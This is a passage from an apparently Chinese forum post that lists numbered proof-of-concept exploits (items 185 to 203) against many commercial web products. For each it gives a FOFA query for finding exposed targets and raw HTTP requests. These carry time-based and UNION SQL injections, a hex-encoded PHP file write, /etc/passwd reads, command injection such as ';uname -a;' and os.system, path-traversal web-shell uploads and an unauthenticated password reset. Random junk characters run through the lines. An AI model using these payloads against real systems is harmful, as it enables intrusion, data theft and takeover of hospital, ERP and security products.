' T! i! ?7 W5 m3 Qinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')) R" b6 o3 c8 a/ A0 G) V2 H$ }! q
$ E; \, _' F" V5 T0 [) H
) ~# I8 b3 S3 }+ w. S. S185. 瑞友天翼应用虚拟化系统SQL注入
3 y3 S0 a1 J5 Eversion < 7.0.5.1
- Q: |; D5 ?$ D, H+ P/ v2 uFOFA:app="REALOR-天翼应用虚拟化系统"
" q6 T8 H5 ?2 z" N/ S% ?GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
" u# ~- e! c1 G& v* B, i, oHost: host# a3 I5 b. M; G2 O
% f; m1 ]* M4 ^+ W7 c
- d, Y+ g+ a9 T) l! Z: R3 O
186. F-logic DataCube3 SQL注入% B# y; U8 P* a' t, J2 |- b* ~
CVE-2024-317507 Z4 C' {2 K5 a! c9 [1 {4 B9 a
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统! \% K* s7 J- G
FOFA:title=="DataCube3"
, Q6 b9 N* E" U8 t, UPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
5 l' ?' I1 z8 J7 z; c- |5 SHost: your-ip! J+ o8 B; A/ Y7 ~9 v. k2 C i) ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" C& i5 O! g7 I# D9 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
/ @$ ]6 ^ p3 ]& W6 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 @( C% c* S/ g# l# b
Accept-Encoding: gzip, deflate7 A1 N# y9 k$ ~2 f7 F
Connection: close- }; B; M) Z( [
Content-Type: application/x-www-form-urlencoded# p& G# z, F! H r+ V
+ O y S2 e' u0 A! t$ Treq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450% S( n: b* ~$ ?% Q6 v
/ {& F7 H* ?" ?; K& O+ Q$ A0 f
- x. k! L% @9 n' i
187. Mura CMS processAsyncObject SQL注入
4 ]& \$ h: p) I+ d" y# p& c1 A. d* [CVE-2024-326401 r& a8 }) n5 B. e
FOFA:"Mura CMS"- ?3 G: d( W! i# B2 b- U
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
f8 B) L2 S. M Z$ G& [5 A6 hHost: your-ip8 R" n- m2 f7 w# C
Content-Type: application/x-www-form-urlencoded w& J5 w' ?& o$ E
+ e+ a S1 ]/ g$ c: p6 G( z' M, H( {* b% |; j0 G w- ]' ^ M
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
: }& ~# Z Y: y+ L8 `; i
% O. b, |. r& ?: d9 v7 l% }6 U& n3 C% c3 M l+ d
188. 叁体-佳会视频会议 attachment 任意文件读取% P- t7 o& `# _+ U. u! X
version <= 3.9.78 V1 s6 p9 ~4 Q' R: [2 `$ v
FOFA:body="/system/get_rtc_user_defined_info?site_id"$ F( E* v$ ~& {5 L- V5 o! u/ o9 k2 _, b
GET /attachment?file=/etc/passwd HTTP/1.14 n( g9 z. n! b- a) ^2 Z* n9 i
Host: your-ip
; [+ r, l. y& M( L: p3 [5 j8 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% U5 \- M5 h6 r2 f) C0 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- ]+ b2 o" m; v @1 I9 ]2 n
Accept-Encoding: gzip, deflate
2 p- |' I5 a8 ^/ _1 a+ mAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 _: J, w6 x6 e" |Connection: close
& A9 r3 P$ C2 P( l% T- i3 ?1 F
2 G* a+ U( {. A% K" N0 _( d3 ?8 z! v+ Q- u4 z. k0 f
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
4 n$ `# P6 W- iFOFA:app="LANWON-临床浏览系统"
; _: H1 P2 M0 C @, `' {GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
1 q7 `( b3 ?8 x- W/ x$ F% T9 JHost: your-ip
; z0 @4 v6 k _. }0 E4 ~# ZUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" m+ V. W1 C; i) N3 ~9 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 n' m* [5 @$ s1 P& G6 n
Accept-Encoding: gzip, deflate
- |1 V7 B/ J% t. m& P$ JAccept-Language: zh-CN,zh;q=0.9
5 u: y* k. s& `# Q6 ^; z9 QConnection: close6 y5 @" K8 a0 ?9 Y$ b7 U. L
! i0 G. |4 V8 u) Z$ T! M: U; ?5 g. Y0 v2 {% W7 r7 v
190. 短视频矩阵营销系统 poihuoqu 任意文件读取: A. T$ o/ d7 K: {3 @ ?
FOFA:title=="短视频矩阵营销系统"/ c9 g( o# R/ I, M' G
POST /index.php/admin/Userinfo/poihuoqu HTTP/2; Z/ w3 ` _) Z, l$ r7 s/ T
Host: your-ip' f8 N! [6 r2 R2 ?: s# p1 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.361 b' I( w6 C9 v8 r8 U7 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& _% A- N8 M" ?4 o1 \' _Content-Type: application/x-www-form-urlencoded! V4 ^ ^1 h0 \2 t, o! [' ]9 Z: }
Accept-Encoding: gzip, deflate
$ N5 b6 E" D# Y$ N( d' n$ Y$ m( D6 i; kAccept-Language: zh-CN,zh;q=0.9
( a* s, d1 N3 T3 |$ E# m& b! H3 i! i0 T1 y' F+ j9 x0 M' j
poi=file:///etc/passwd- y2 N% u. J/ y* I5 y. E, S- c
5 M3 u7 K, r! {" ^! o7 [# G3 o
/ ^, G8 J, n1 y191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入* i/ ], q! g5 `/ F
FOFA:body="/CDGServer3/index.jsp"' h4 i3 r( g" g: {/ ~
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
+ ? S. a5 ~* x. C6 t0 ~/ E @+ vHost: your-ip( [; e* @) R, c% U$ v( T4 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 V7 E" m4 }2 `$ ` z: K
Content-Type: application/x-www-form-urlencoded$ p' z% |5 T4 q% x( h) r7 y# l
( U1 v4 ~0 \( a+ j
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
/ a6 ^! R2 X9 q; w+ D% h+ R, f/ ~
1 e6 U7 x6 l/ O4 E
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
" q$ e: c' I+ x8 B2 gFOFA:title="用户登录_富通天下外贸ERP". h' ]9 Q' a) y) `
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
" `+ h; C+ e* Q' ^* ]Host: your-ip
) h: w" R- t u$ k! d# s! bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% S; w0 ^6 i: v
Content-Type: application/x-www-form-urlencoded; ?, M% R8 o) k) F7 D3 F7 f
* C% P. c, E# W
" N7 {7 D$ ]7 Y3 a% G, u6 M1 @<% @ webhandler language="C#" class="AverageHandler" %>5 E! L- v) e$ A# F$ P7 ~
using System;
* c. a( A! A& f0 e! ^# ]using System.Web;% _0 M% G, K) o; l
public class AverageHandler : IHttpHandler
& p k9 X8 y0 u{, U( P) z+ M2 |. |9 m$ L0 d2 L( y$ B
public bool IsReusable+ u$ C$ G, u( Y5 o! R, X
{ get { return true; } }7 d& Z! G: e# t/ i2 q2 R: A
public void ProcessRequest(HttpContext ctx)3 c8 a; X! B' ]; K& @
{* t5 Y8 O: o% G, I
ctx.Response.Write("test");
. k0 h2 O: z* \ X% G}% ?' W$ ]2 Y6 n6 E2 ?- |2 o
}
" D) k" [" D8 z* w* u% { O" F7 h. x/ u5 ]; b; r4 a6 g" p4 ?
) Z$ K9 q) e# [0 n
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行$ f9 U3 j8 |4 F' f% [
FOFA:body="山石云鉴主机安全管理系统"5 v8 i5 {* S k+ s
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
; I( ^. m$ _) S3 C( ?7 Y6 g5 \Host:! l, h/ i& A8 Q* S
Cookie: PHPSESSID=2333333333333;3 ^, `3 O9 m0 L
Content-Type: application/x-www-form-urlencoded
& y0 |" \& v9 v" ~8 A: s' p5 KUser-Agent: Mozilla/5.0
f0 e6 u4 p: j6 Y9 J/ ?5 Y# K7 n- m0 Z6 u
" ~; t: g3 T+ }5 w- H( _
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
1 j" \$ W" D0 w% _7 s: Y2 e' @ L1 GHost:
, v1 {" g( s9 N2 P( rUser-Agent: Mozilla/5.0
9 e, ]1 }* _! v+ ]Accept-Encoding: gzip, deflate3 U. j8 A% W4 | i
Accept: */*3 f- n c0 Y5 s/ h7 I
Connection: close3 K' b4 K2 v' m. u
Cookie: PHPSESSID=2333333333333;
. `0 U1 x6 k" y2 ZContent-Type: application/x-www-form-urlencoded
; M% m& N5 V; KContent-Length: 84
; l2 U0 }" D |5 m" T
( f: s# h5 [8 iparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
. f, W; o$ K9 C" ?
- N* C1 d7 x, Y8 v$ w8 ]' V: Z( y+ \; n" `7 V0 G
GET /master/img/config HTTP/1.1
. h7 y' k8 j+ t/ E2 NHost:
0 s, z: u. {. A4 RUser-Agent: Mozilla/5.0
! A9 g4 p3 g' F* \) t6 E1 U1 g: P+ L M, Q$ w) L. S: f
8 G7 {- X5 l7 w6 X194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传( s$ ~5 `" G: E. M
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在& r3 ?+ y$ Y3 W* @/ E! n$ o
, M" ]0 X( f9 ~7 zPOST /servlet/uploadAttachmentServlet HTTP/1.16 q6 l; |0 c! Y% c; I: g# M
Host: host! [+ G N4 p" s$ E: a# d3 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.362 ?! J4 s: F1 T, w! A/ Y# Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 w }- v" O' ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ S; X' g! s/ |& ~7 GAccept-Encoding: gzip, deflate
( I: A4 D6 W. g. cConnection: close
% o6 | d- i" U& uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk8 a6 I: e1 k/ R4 E) S" U
------WebKitFormBoundaryKNt0t4vBe8cX9rZk5 P" K# Y2 J# x" B3 F& P
) Z6 V4 i4 h* z6 v4 w. b `( t1 {Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
4 w( b. K/ A: b# ^6 K9 K' QContent-Type: text/plain' [% U z$ ?5 [& h6 p
<% out.println("hello");%>
/ \# |/ h6 t' H& f' O------WebKitFormBoundaryKNt0t4vBe8cX9rZk2 S' y0 j" V- g( G
Content-Disposition: form-data; name="json"
+ A1 B/ L9 C' H {"iq":{"query":{"UpdateType":"mail"}}}
+ w0 U5 z$ O4 o9 M; ~* x* m------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
, o* k( t5 q! T4 P; l* A6 o
! K4 d6 w- q& V4 V/ j1 |
' Z- H2 ?0 [& E; P$ y! u( [, B195. 飞鱼星上网行为管理系统 send_order.cgi命令执行4 F8 ` K; l: z5 M9 {+ [) j; p
FOFA:title=="飞鱼星企业级智能上网行为管理系统* m4 b. _6 V" L( X, M/ u! L, v
POST /send_order.cgi?parameter=operation HTTP/1.1
7 a* ~7 O. l' n/ MHost: 127.0.0.1
# Y: y; ?+ r0 t3 c! f. UPragma: no-cache4 _# C9 V8 M$ B7 Q7 i) {, f1 D
Cache-Control: no-cache& h+ o9 O5 c& l S: W& ? ^9 I5 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; U1 u6 `3 ~0 |2 q U) e( T
Accept: */*% o9 X# q f# \ D2 \- f' h
Accept-Encoding: gzip, deflate4 ?& f: k+ P7 H( ^& B! `$ O+ ]
Accept-Language: zh-CN,zh;q=0.9
! _' B% c0 J1 z# qConnection: close# {5 S' g7 g% f$ z1 S8 b
Content-Type: application/x-www-form-urlencoded
/ l: j* P G8 d: yContent-Length: 68% h5 q6 L. l- h+ P$ E0 k: W
1 l) Q9 `2 B- Q3 _+ J1 X4 i
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
: A V! x1 _' S0 w" z- K
0 Z; ]# S: e* U# R( }, K7 f0 m. Q- _: i L
196. 河南省风速科技统一认证平台密码重置9 n9 @0 H$ @5 K- r# r
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"9 S- ]7 C/ l& C) \" i
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1' @7 Y g3 O, e5 E$ p2 C6 R/ D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36* @: ^: v& B U \. M" M6 A
Content-Type: application/json;charset=UTF-82 A+ U) t+ b! ~, `% a7 u8 m- ]3 F
X-Requested-With: XMLHttpRequest
/ L* V' O# i5 \8 I9 B- r4 I& SHost:- F; }4 m: v3 [0 n, n( h3 U& f& n, q
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
/ G0 T6 K! w# IContent-Length: 45
v! d) @0 {7 Z+ j3 _8 x3 [Connection: close
) |; f9 O5 h% }( q f" ~: |+ g5 U9 T6 @: y7 \. F/ N
{"xgh":"test","newPass":"test666","email":""}9 p- d9 d E# G) q; @2 V' }: N
7 G& c$ W0 G1 b, b
2 Z [! u4 g5 T) l
7 V! ?+ R3 v1 |: U197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
: J# D/ O0 J/ D7 U4 ^/ Z- f: S8 T8 i/ AFOFA:app="浙大恩特客户资源管理系统"2 }: a: z- q6 X# V0 \( r9 H
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
# N. B' R6 Z8 J: a" l6 `Host:
" @; M" k6 g' y9 ~, j' i! c KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
$ O7 c3 v! f" D/ {3 ]Accept-Encoding: gzip, deflate
& k! ^0 B- P/ i3 h3 X% WConnection: close
/ m8 F/ ^% N& z) A; i2 \4 \' e0 ~0 j+ s9 ? }" \7 Z
# H* y2 u! e5 o& h! w
h; a7 H" ~0 m: J+ f* n9 I; E* y
198. 阿里云盘 WebDAV 命令注入
, p: J' L+ l4 M9 rCVE-2024-29640
8 T$ y0 K2 P. Y0 I* {# x! aGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
8 {8 F/ F- N+ P3 ^ {4 ^Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
& j2 }& J# A ?/ |3 w _$ bAccept: */*
' {0 z- p5 a4 I {4 ]Accept-Encoding: gzip, deflate
- @3 w) N/ Q8 w% D+ N2 [. gAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
9 x4 Z5 c& A. V/ x$ L3 R' b' zConnection: close
* F8 H2 |2 B( t" \2 X6 }( w! P9 T% _9 A# _8 [
- |, L# a1 c5 a% A
199. cockpit系统assetsmanager_upload接口 文件上传
& u* q7 S2 k4 n/ p, F; i$ h, a+ ^- `) b
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:0 r. J8 {3 B. i" A3 u
GET /auth/login?to=/ HTTP/1.1- v' @/ }& I1 A. G2 U
4 [* M) g' e7 C/ t% s: h g9 F# Q/ Z
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"$ n$ u b+ H3 g y* {
) j8 \% N9 O j& e) P# S5 D l9 x
2.使用刚才上一步获取到的jwt获取cookie:
$ W2 z0 n8 f& s% j4 j- }/ c0 Z
f+ [/ @- n5 {- w1 w4 E( VPOST /auth/check HTTP/1.1& x a h7 D& B
Content-Type: application/json
; B1 j: u& S( B! _0 [/ B( D8 r
- k! c6 P& j7 r# V. } D+ b{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}" V. C9 J7 b1 V. U9 E
% w. S3 B- o7 @; K# A
响应:200,返回值:
& H( N& F6 `+ {; b$ f& HSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/! q+ ?+ K# ^( j4 M0 V" u) m; N7 G
Fofa:title="Authenticate Please!"1 ^ y. X8 P# b" b
POST /assetsmanager/upload HTTP/1.18 [0 L& T3 A4 U( E. V* n
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
/ b$ [4 ^6 m# f7 F& U: e+ q: B/ x; @Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
% x: |1 W- l* k5 p0 t t9 [" Q2 W, x; g6 B1 R: x% {
-----------------------------36D28FBc36bd6feE7Fb3
& ?* H! m( i1 N/ i( u% UContent-Disposition: form-data; name="files[]"; filename="tttt.php"+ M1 {3 v8 |4 a) k* X) j
Content-Type: text/php7 T4 t: s- T+ c8 V: {. C
: J+ Q" b [9 p" J0 g0 e% X
<?php echo "tttt";unlink(__FILE__);?>) z8 N+ p/ M7 a: W8 Z
-----------------------------36D28FBc36bd6feE7Fb3% c) }& }5 V8 T1 a5 b. v# ?: V
Content-Disposition: form-data; name="folder"9 H/ Z7 u" D; f/ ?8 |5 |" L- V+ P
5 L2 E2 Y4 L u' ^5 T3 s; _# o' r, |' k
-----------------------------36D28FBc36bd6feE7Fb3--
% o1 K: \; V- R; L; ~$ {7 b
9 S+ w: I0 o1 F2 X
, m' p) ?& z& ?% t) U" V/storage/uploads/tttt.php
4 S: y; [2 ^( q
! p+ U& N. T8 r3 z' b5 l2 o7 D+ d200. SeaCMS海洋影视管理系统dmku SQL注入
$ U0 o x4 p* L$ |* Q1 f4 b- ~FOFA:app="海洋CMS"
3 q+ |3 T0 n+ h# [$ a! K) VGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1$ \, n; e7 J# Z3 {) v9 T6 ^
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s) v4 r$ c+ N+ o0 f
Upgrade-Insecure-Requests: 1: |4 ^( |& ?$ r& A5 @ I$ @. K
Cache-Control: max-age=0" |2 m ~1 }, ?7 f! J r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) K" y( h1 M# W! I& FAccept-Encoding: gzip, deflate2 `4 C' G) P4 Q- P. n6 V; N, [
Accept-Language: zh-CN,zh;q=0.9; g" v$ E: i: E1 F/ c; w) q/ H
- s3 r' x+ o4 v# Z2 l
- ?2 z _" s+ h0 X V8 f
201. 方正全媒体新闻采编系统 binary SQL注入
- X5 ~8 q2 C. C% i+ b- PFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"0 Q8 n9 K! J W7 {8 \4 o4 H+ ?/ w
POST /newsedit/newsplan/task/binary.do HTTP/1.13 u; q8 R s9 _% @5 |5 g+ v& C* f& U
Content-Type: application/x-www-form-urlencoded
) A% ]) E3 t- ?7 u2 ~! nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 {: }, [# s! T/ k1 y; {2 \/ L' a# B$ \
Accept-Encoding: gzip, deflate
( Z8 Q' q5 B, z$ j! l) k. a1 P& @Accept-Language: zh-CN,zh;q=0.9- h$ g) t s0 Q% |% F% P; Z
Connection: close
2 b0 j1 q, v/ v. L' j/ G0 q0 T4 p& q0 W7 ?
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1" c$ |' d' ]$ x; H; E7 ?0 q/ P. P
: J- g' D; L1 S( f& M
# U3 B2 I( H1 h+ T+ J
202. 微擎系统 AccountEdit任意文件上传
2 E( t8 e! f2 u5 \; F2 N# iFOFA:body="/Widgets/WidgetCollection/"
. F9 v& e; O: v获取__VIEWSTATE和__EVENTVALIDATION值) p |, T% z# P, c1 z, A
GET /User/AccountEdit.aspx HTTP/1.1
6 t( u( v `0 q. ?& ^ cHost: 滑板人之家0 O2 B2 f" D! ?$ k' `2 m$ Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.318 x. S5 b7 Y8 s& c& h# v/ u& B. T
Content-Length: 0" F Y# D0 i" m/ J: b
' h% j% }2 j/ A3 l! ^6 G" G4 i, G/ H" e( ?" K7 \1 k
替换__VIEWSTATE和__EVENTVALIDATION值
& r& D) h4 Z- l- k, IPOST /User/AccountEdit.aspx HTTP/1.1# a, w5 H% R8 y5 m( ]- x1 w
Accept-Encoding: gzip, deflate, br
+ k ]) R. ^/ A8 wContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687( k: I- E# I$ u& `+ c% r& I+ c$ R* ?
( a( _) i% W5 y! C* z D-----------------------------786435874t38587593865736587346567358735687; _/ G+ v' d5 ` x. \" _
Content-Disposition: form-data; name="__VIEWSTATE"
3 S( u3 N& K: s" |- p" b! M {# ]" U
__VIEWSTATE
. q( z4 N. h! o' |( ` ]% C# ~; ]-----------------------------786435874t38587593865736587346567358735687
2 \6 b4 P& t% x' AContent-Disposition: form-data; name="__EVENTVALIDATION"
2 G0 [ o& E) E. A) F4 `. H# ]% p2 V0 W0 L
__EVENTVALIDATION7 P* n* `' ^7 w
-----------------------------786435874t38587593865736587346567358735687
+ L4 V' ?5 T! g- j$ }: ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"4 ~/ T7 C8 ~& ^; R- j/ F3 v( E
Content-Type: text/plain
, s2 ^$ J% m" R1 \2 {! x( C/ [2 V& G5 X( L3 R8 j
Hello World!/ F4 `$ K! Z& F ?# V! d' F
-----------------------------786435874t38587593865736587346567358735687
5 s+ A" ]; ~+ x) `Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
/ A# U/ a& u: A: E
2 n' ^1 F( k6 E, g! r% w上传图片) D4 I, S3 G& d
-----------------------------786435874t38587593865736587346567358735687! F6 y2 y5 R+ `* o; p9 |
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
+ ^3 O9 q+ @4 j- o. Y
# c0 [5 o9 x6 U3 y
& A* X- J+ _3 O4 V5 Q-----------------------------786435874t38587593865736587346567358735687
0 }1 i I3 J1 _) b0 ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
1 \/ ]% H/ _' S0 X8 Y0 ^$ r* U f7 G7 q4 j* _
. x- J% }$ x# x* J: a# \ {
-----------------------------786435874t38587593865736587346567358735687--$ U$ x9 v+ a% B" q- N
7 _) J- j; ]! k; R# |- F9 X+ p+ U. n+ ]9 }* Z4 |" E
/_data/Uploads/1123.txt
; w& r/ A) j! t5 J& q: i
* F8 M% r0 \/ J! i% X1 C203. 红海云EHR PtFjk 文件上传
- Q) Z, A8 i w7 EFOFA:body="RedseaPlatform"" \- J5 D# h8 A+ c7 S. {* l2 P6 Z
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.19 p4 y; Z' _4 M& I& q0 a
Host: x.x.x.x. `9 t5 I* T/ l9 N
Accept-Encoding: gzip4 } f( q+ v/ W, T1 J* P2 n% h" w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 t" W& ~0 F+ U5 L0 Y. VContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4, A0 [7 D9 M- s9 u
Content-Length: 210 v! h- h$ C# Y2 G
% m- p% [0 ?/ Q. V------WebKitFormBoundaryt7WbDl1tXogoZys47 S/ f$ e2 s4 H6 g9 H( j/ w
Content-Disposition: form-data; name="fj_file"; filename="11.jsp". u* o" C3 H9 h5 i5 Z7 j* `5 \" V. q
Content-Type:image/jpeg
* \+ L% Q7 K) ~8 S( x' v n( f4 @1 S5 J; o2 [( @
<% out.print("hello,eHR");%>
" C7 p0 f _3 r4 l% F+ a------WebKitFormBoundaryt7WbDl1tXogoZys4--& C3 W' B; R. A0 R
2 x- J/ o& E; s, m* x
$ F& @! a0 ~& ?" H: B9 S
4 g9 s/ [ W% H8 c1 C8 \. k, a8 v g( _- w8 [
. S% J2 ?, g" z5 k5 {. R
+ G. O8 o5 T6 R* ^* @' o! \ |
发表于 2024-6-5 14:31:29
收藏
支持
反对